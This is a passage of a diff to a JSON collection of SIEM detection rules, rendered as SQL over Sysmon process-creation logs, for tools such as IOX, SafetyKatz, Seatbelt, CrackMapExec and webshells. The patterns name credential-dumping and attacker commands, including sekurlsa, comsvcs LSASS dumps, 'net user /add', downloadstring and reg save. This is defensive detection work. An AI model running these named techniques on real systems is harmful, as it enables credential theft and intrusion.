'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\conhost.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2022_29072_7zip.yml" + "filename": "proc_creation_win_dns_susp_child_process.yml" }, { - "title": "HackTool - SafetyKatz Execution", - "id": "b1876533-4ed5-4a83-90f3-b8645840a413", + "title": "PUA- IOX Tunneling Tool Execution", + "id": "d7654f02-e04b-4934-9838-65c46f187ebc", "status": "experimental", - "description": "Detects the execution of the hacktool SafetyKatz via PE information and default Image name", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of IOX - a tool for port forwarding and intranet proxy purposes", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "Unlikely" + "Legitimate use" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SafetyKatz.exe' ESCAPE '\\' OR OriginalFileName = 'SafetyKatz.exe' OR Description = 'SafetyKatz'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\iox.exe' ESCAPE '\\' OR (CommandLine LIKE '%.exe fwd -l %' ESCAPE '\\' OR CommandLine LIKE '%.exe fwd -r %' ESCAPE '\\' OR CommandLine LIKE '%.exe proxy -l %' ESCAPE '\\' OR CommandLine LIKE '%.exe proxy -r %' ESCAPE '\\') OR (Hashes LIKE '%MD5=9DB2D314DD3F704A02051EF5EA210993%' ESCAPE '\\' OR Hashes LIKE '%SHA1=039130337E28A6623ECF9A0A3DA7D92C5964D8DD%' ESCAPE '\\' OR Hashes LIKE '%SHA256=C6CF82919B809967D9D90EA73772A8AA1C1EB3BC59252D977500F64F1A0D6731%' ESCAPE '\\') OR md5 = '9db2d314dd3f704a02051ef5ea210993' OR sha1 = '039130337e28a6623ecf9a0a3da7d92c5964d8dd' OR sha256 = 
'c6cf82919b809967d9d90ea73772a8aa1c1eb3bc59252d977500f64f1a0d6731'))" ], - "filename": "proc_creation_win_hktl_safetykatz.yml" + "filename": "proc_creation_win_pua_iox.yml" }, { - "title": "Windows Defender Download Activity", - "id": "46123129-1024-423e-9fae-43af4a0fa9a5", - "status": "test", - "description": "Detect the use of Windows Defender to download payloads", - "author": "Matthew Matchen", + "title": "MERCURY APT Activity", + "id": "a62298a3-1fe0-422f-9a68-ffbcbc5a123d", + "status": "experimental", + "description": "Detects suspicious command line patterns seen being used by MERCURY APT", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.command_and_control", - "attack.t1105" + "attack.execution", + "attack.t1059.001", + "attack.g0069" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%MpCmdRun.exe%' ESCAPE '\\' OR Description = 'Microsoft Malware Protection Command Line Utility') AND (CommandLine LIKE '%DownloadFile%' ESCAPE '\\' AND CommandLine LIKE '%url%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-exec bypass -w 1 -enc%' ESCAPE '\\' AND CommandLine LIKE '%UwB0AGEAcgB0AC0ASgBvAGIAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAHsAKABzAGEAcABzACAAKAAiAHAA%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_susp_mpcmdrun_download.yml" + "filename": "proc_creation_win_apt_mercury.yml" }, { - "title": "Exploiting CVE-2019-1388", - "id": "02e0b2ea-a597-428e-b04a-af6a1a403e5c", - "status": "stable", - "description": "Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM", + "title": "Webshell Hacking Activity Patterns", + "id": "4ebc877f-4612-45cb-b3a5-8e3834db36c9", + "status": "experimental", + 
"description": "Detects certain parent child patterns found in cases in which a webshell is used to perform certain credential dumping or exfiltration activities on a compromised system", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1068" + "attack.persistence", + "attack.t1505.003", + "attack.t1018", + "attack.t1033", + "attack.t1087" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\consent.exe' ESCAPE '\\' AND Image LIKE '%\\\\iexplore.exe' ESCAPE '\\' AND CommandLine LIKE '% http%' ESCAPE '\\') AND (IntegrityLevel = 'System' OR (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentImage LIKE '%-tomcat-%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%comsvcs%' ESCAPE '\\') OR (CommandLine LIKE '% -hp%' ESCAPE '\\' AND CommandLine LIKE '% a %' ESCAPE '\\' AND CommandLine LIKE '% -m%' ESCAPE '\\') OR (CommandLine LIKE '%net%' ESCAPE '\\' AND CommandLine LIKE '% user %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE 
'\\') OR (CommandLine LIKE '%net%' ESCAPE '\\' AND CommandLine LIKE '% localgroup %' ESCAPE '\\' AND CommandLine LIKE '% administrators %' ESCAPE '\\' AND CommandLine LIKE '%/add%' ESCAPE '\\') OR (Image LIKE '%\\\\ntdsutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\ldifde.exe' ESCAPE '\\' OR Image LIKE '%\\\\adfind.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\Nanodump.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\fsutil.exe' ESCAPE '\\') OR (CommandLine LIKE '% -NoP %' ESCAPE '\\' OR CommandLine LIKE '% -W Hidden %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% /decode %' ESCAPE '\\' OR CommandLine LIKE '%reg save %' ESCAPE '\\' OR CommandLine LIKE '%.downloadstring(%' ESCAPE '\\' OR CommandLine LIKE '%.downloadfile(%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% sekurlsa%' ESCAPE '\\' OR CommandLine LIKE '%.dmp full%' ESCAPE '\\' OR CommandLine LIKE '%process call create%' ESCAPE '\\' OR CommandLine LIKE '%whoami /priv%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2019_1388.yml" + "filename": "proc_creation_win_webshell_hacking.yml" }, { - "title": "Suspicious Outlook Child Process", - "id": "208748f7-881d-47ac-a29c-07ea84bf691d", + "title": "Remote Access Tool - AnyDesk Silent Installation", + "id": "114e7f1c-f137-48c8-8f54-3088c24ce4b9", "status": "test", - "description": "Detects a suspicious process spawning from an Outlook process.", - "author": "Michael Haag, Florian Roth (Nextron Systems), Markus Neis, Elastic, FPT.EagleEye Team", + "description": "Detects AnyDesk Remote Desktop silent installation. 
Which can be used by attackers to gain remote access.", + "author": "Ján Trenčanský", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate deployment of AnyDesk" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\OUTLOOK.EXE' ESCAPE '\\' AND (Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%--install%' ESCAPE '\\' AND CommandLine LIKE '%--start-with-win%' ESCAPE '\\' AND CommandLine LIKE '%--silent%' ESCAPE '\\')" ], - "filename": "proc_creation_win_office_outlook_susp_child_processes.yml" + "filename": "proc_creation_win_remote_access_tools_anydesk_silent_install.yml" }, { - "title": "Parent in Public Folder Suspicious Process", - "id": "69bd9b97-2be2-41b6-9816-fb08757a4d1a", - "status": "experimental", - "description": "This rule detects suspicious processes with parent images located in 
the C:\\Users\\Public folder", + "title": "Suspicious HWP Sub Processes", + "id": "023394c4-29d5-46ab-92b8-6a534c6f447b", + "status": "test", + "description": "Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation", "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.initial_access", + "attack.t1566.001", + "attack.execution", + "attack.t1203", + "attack.t1059.003", + "attack.g0032" + ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%wscript.exe%' ESCAPE '\\' OR CommandLine LIKE '%cscript.exe%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%mshta.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\Hwp.exe' ESCAPE '\\' AND Image LIKE '%\\\\gbb.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_execution_from_public_folder_as_parent.yml" + "filename": "proc_creation_win_hwp_exploits.yml" }, { - "title": "Potential Dridex Activity", - "id": "e6eb5a96-9e6f-4a18-9cdd-642cfda21c8e", - "status": "stable", - "description": "Detects potential Dridex acitvity via specific process patterns", - "author": "Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "title": "Uninstall Sysinternals Sysmon", + "id": "6a5f68d1-c4b5-46b9-94ee-5324892ea939", + "status": "test", + "description": "Detects 
the removal of Sysmon, which could be a potential attempt at defense evasion", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055", - "attack.discovery", - "attack.t1135", - "attack.t1033" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\') AND NOT (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\excel.exe' ESCAPE '\\' AND Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '% -s %' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%.dll%' ESCAPE '\\'))) OR (ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\whoami.exe' ESCAPE '\\' AND CommandLine LIKE '% /all%' ESCAPE '\\') OR ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% view%' ESCAPE '\\')))))" + "attack.t1562.001" ], - "filename": "proc_creation_win_malware_dridex.yml" - }, - { - "title": "Suspicious Program Names", - "id": "efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6", - "status": "test", - "description": "Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools", - "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate tools that accidentally match on the searched patterns" + "Legitimate administrators might use this command to remove Sysmon for debugging purposes" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\CVE-202%' ESCAPE '\\' OR Image LIKE '%\\\\CVE202%' ESCAPE '\\') OR (Image LIKE '%\\\\poc.exe' ESCAPE 
'\\' OR Image LIKE '%\\\\artifact.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact64.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact\\_protected.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact32.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact32big.exe' ESCAPE '\\' OR Image LIKE '%obfuscated.exe' ESCAPE '\\' OR Image LIKE '%obfusc.exe' ESCAPE '\\' OR Image LIKE '%\\\\meterpreter' ESCAPE '\\') OR (CommandLine LIKE '%inject.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CVE%' ESCAPE '\\' OR CommandLine LIKE '%pupy.ps1%' ESCAPE '\\' OR CommandLine LIKE '%payload.ps1%' ESCAPE '\\' OR CommandLine LIKE '%beacon.ps1%' ESCAPE '\\' OR CommandLine LIKE '%PowerView.ps1%' ESCAPE '\\' OR CommandLine LIKE '%bypass.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfuscated.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfusc.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfus.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfs.ps1%' ESCAPE '\\' OR CommandLine LIKE '%evil.ps1%' ESCAPE '\\' OR CommandLine LIKE '%MiniDogz.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\_enc.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\shell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\rshell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%revshell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\av.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\av\\_test.ps1%' ESCAPE '\\' OR CommandLine LIKE '%adrecon.ps1%' ESCAPE '\\' OR CommandLine LIKE '%mimikatz.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PowerUp\\_%' ESCAPE '\\' OR CommandLine LIKE '%powerup.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\a.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\p.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\1.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Hound.ps1%' ESCAPE '\\' OR CommandLine LIKE '%encode.ps1%' ESCAPE '\\' OR CommandLine LIKE '%powercat.ps1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Sysmon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Sysmon.exe' ESCAPE '\\') OR 
Description = 'System activity monitor') AND (CommandLine LIKE '%-u%' ESCAPE '\\' OR CommandLine LIKE '%/u%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_progname.yml" + "filename": "proc_creation_win_sysinternals_sysmon_uninstall.yml" }, { - "title": "Potential Conti Ransomware Database Dumping Activity", - "id": "2f47f1fd-0901-466e-a770-3b7092834a1b", + "title": "Invoke-Obfuscation Via Use MSHTA", + "id": "ac20ae82-8758-4f38-958e-b44a3140ca88", "status": "test", - "description": "Detects a command used by conti to dump database", - "author": "frack113", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.collection", - "attack.t1005" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sqlcmd.exe' ESCAPE '\\' OR (CommandLine LIKE '%sqlcmd %' ESCAPE '\\' OR CommandLine LIKE '%sqlcmd.exe%' ESCAPE '\\')) AND CommandLine LIKE '% -S localhost %' ESCAPE '\\' AND (CommandLine LIKE '%sys.sysprocesses%' ESCAPE '\\' OR CommandLine LIKE '%master.dbo.sysdatabases%' ESCAPE '\\' OR CommandLine LIKE '%BACKUP DATABASE%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND CommandLine LIKE '%mshta%' ESCAPE '\\' AND CommandLine LIKE '%vbscript:createobject%' ESCAPE '\\' AND CommandLine LIKE '%.run%' ESCAPE '\\' AND CommandLine LIKE '%(window.close)%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_conti_ransomware_database_dump.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml" }, { - "title": "PUA - NSudo Execution", - "id": "771d1eb5-9587-4568-95fb-9ec44153a012", + "title": "Add 
SafeBoot Keys Via Reg Utility", + "id": "d7662ff6-9e97-4596-a61d-9839e32dee8d", "status": "experimental", - "description": "Detects the use of NSudo tool for command execution", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", + "description": "Detects execution of \"reg.exe\" commands with the \"add\" or \"copy\" flags on safe boot registry keys. Often used by attacker to allow the ransomware to work in safe mode as some security products do not", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate use by administrators" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\NSudo.exe' ESCAPE '\\' OR Image LIKE '%\\\\NSudoLC.exe' ESCAPE '\\' OR Image LIKE '%\\\\NSudoLG.exe' ESCAPE '\\') OR OriginalFileName IN ('NSudo.exe', 'NSudoLC.exe', 'NSudoLG.exe')) AND (CommandLine LIKE '%-U:S %' ESCAPE '\\' OR CommandLine LIKE '%-U:T %' ESCAPE '\\' OR CommandLine LIKE '%-U:E %' ESCAPE '\\' OR CommandLine LIKE '%-P:E %' ESCAPE '\\' OR CommandLine LIKE '%-M:S %' ESCAPE '\\' OR CommandLine LIKE '%-M:H %' ESCAPE '\\' OR CommandLine LIKE '%-U=S %' ESCAPE '\\' OR CommandLine LIKE '%-U=T %' ESCAPE '\\' OR CommandLine LIKE '%-U=E %' ESCAPE '\\' OR CommandLine LIKE '%-P=E %' ESCAPE '\\' OR CommandLine LIKE '%-M=S %' ESCAPE '\\' OR CommandLine LIKE '%-M=H %' ESCAPE '\\' OR CommandLine LIKE '%-ShowWindowMode:Hide%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot%' ESCAPE '\\' AND (CommandLine LIKE '% copy %' ESCAPE '\\' OR CommandLine LIKE '% add %' ESCAPE '\\'))" ], - "filename": 
"proc_creation_win_pua_nsudo.yml" + "filename": "proc_creation_win_reg_add_safeboot.yml" }, { - "title": "DLL Sideloading by Microsoft Defender", - "id": "7002aa10-b8d4-47ae-b5ba-51ab07e228b9", + "title": "PUA - Seatbelt Execution", + "id": "38646daa-e78f-4ace-9de0-55547b2d30da", "status": "experimental", - "description": "Detects execution of Microsoft Defender's CLI process (MpCmdRun.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", - "author": "Bhabesh Raj", + "description": "Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.discovery", + "attack.t1526", + "attack.t1087", + "attack.t1083" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\winsxs\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MpCmdRun.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Seatbelt.exe' ESCAPE '\\' OR OriginalFileName = 'Seatbelt.exe' OR Description = 'Seatbelt' OR (CommandLine LIKE '% DpapiMasterKeys%' ESCAPE '\\' OR CommandLine LIKE '% InterestingProcesses%' ESCAPE '\\' OR CommandLine LIKE '% InterestingFiles%' ESCAPE '\\' OR CommandLine LIKE '% CertificateThumbprints%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumBookmarks%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumHistory%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumPresence%' ESCAPE '\\' OR CommandLine LIKE '% 
CloudCredentials%' ESCAPE '\\' OR CommandLine LIKE '% CredEnum%' ESCAPE '\\' OR CommandLine LIKE '% CredGuard%' ESCAPE '\\' OR CommandLine LIKE '% FirefoxHistory%' ESCAPE '\\' OR CommandLine LIKE '% ProcessCreationEvents%' ESCAPE '\\')) OR ((CommandLine LIKE '% -group=misc%' ESCAPE '\\' OR CommandLine LIKE '% -group=remote%' ESCAPE '\\' OR CommandLine LIKE '% -group=chromium%' ESCAPE '\\' OR CommandLine LIKE '% -group=slack%' ESCAPE '\\' OR CommandLine LIKE '% -group=system%' ESCAPE '\\' OR CommandLine LIKE '% -group=user%' ESCAPE '\\' OR CommandLine LIKE '% -group=all%' ESCAPE '\\') AND CommandLine LIKE '% -outputfile=%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_mpcmdrun_dll_sideload_defender.yml" + "filename": "proc_creation_win_pua_seatbelt.yml" }, { - "title": "Suspicious Minimized MSEdge Start", - "id": "94771a71-ba41-4b6e-a757-b531372eaab6", - "status": "test", - "description": "Detects the suspicious minimized start of MsEdge browser, which can be used to download files from the Internet", + "title": "Findstr LSASS", + "id": "fe63010f-8823-4864-a96b-a7b4a0f7b929", + "status": "experimental", + "description": "Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.credential_access", + "attack.t1552.006" ], "falsepositives": [ - "Software that uses MsEdge to download components in the background (see ParentImage, ParentCommandLine)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%start /min msedge%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '%lsass%' ESCAPE '\\') OR (CommandLine LIKE '% /i 
lsass.exe%' ESCAPE '\\' OR CommandLine LIKE '% /i \"lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr.exe lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr \"lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr.exe \"lsass%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_browsers_msedge_minimized_download.yml" + "filename": "proc_creation_win_findstr_lsass.yml" }, { - "title": "Suspicious Atbroker Execution", - "id": "f24bcaea-0cd1-11eb-adc1-0242ac120002", - "status": "test", - "description": "Atbroker executing non-deafualt Assistive Technology applications", - "author": "Mateusz Wydra, oscd.community", + "title": "HackTool - CrackMapExec Execution Patterns", + "id": "058f4380-962d-40a5-afce-50207d36d7e2", + "status": "stable", + "description": "Detects various execution patterns of the CrackMapExec pentesting framework", + "author": "Thomas Patzke", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.t1047", + "attack.t1053", + "attack.t1059.003", + "attack.t1059.001", + "attack.s0106" ], "falsepositives": [ - "Legitimate, non-default assistive technology applications execution" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%AtBroker.exe' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%animations%' ESCAPE '\\' OR CommandLine LIKE '%audiodescription%' ESCAPE '\\' OR CommandLine LIKE '%caretbrowsing%' ESCAPE '\\' OR CommandLine LIKE '%caretwidth%' ESCAPE '\\' OR CommandLine LIKE '%colorfiltering%' ESCAPE '\\' OR CommandLine LIKE '%cursorscheme%' ESCAPE '\\' OR CommandLine LIKE '%filterkeys%' ESCAPE '\\' OR CommandLine LIKE '%focusborderheight%' ESCAPE '\\' OR CommandLine LIKE '%focusborderwidth%' ESCAPE '\\' OR CommandLine LIKE '%highcontrast%' ESCAPE '\\' OR CommandLine LIKE '%keyboardcues%' ESCAPE '\\' OR CommandLine LIKE 
'%keyboardpref%' ESCAPE '\\' OR CommandLine LIKE '%magnifierpane%' ESCAPE '\\' OR CommandLine LIKE '%messageduration%' ESCAPE '\\' OR CommandLine LIKE '%minimumhitradius%' ESCAPE '\\' OR CommandLine LIKE '%mousekeys%' ESCAPE '\\' OR CommandLine LIKE '%Narrator%' ESCAPE '\\' OR CommandLine LIKE '%osk%' ESCAPE '\\' OR CommandLine LIKE '%overlappedcontent%' ESCAPE '\\' OR CommandLine LIKE '%showsounds%' ESCAPE '\\' OR CommandLine LIKE '%soundsentry%' ESCAPE '\\' OR CommandLine LIKE '%stickykeys%' ESCAPE '\\' OR CommandLine LIKE '%togglekeys%' ESCAPE '\\' OR CommandLine LIKE '%windowarranging%' ESCAPE '\\' OR CommandLine LIKE '%windowtracking%' ESCAPE '\\' OR CommandLine LIKE '%windowtrackingtimeout%' ESCAPE '\\' OR CommandLine LIKE '%windowtrackingzorder%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%cmd.exe /Q /c % 1> 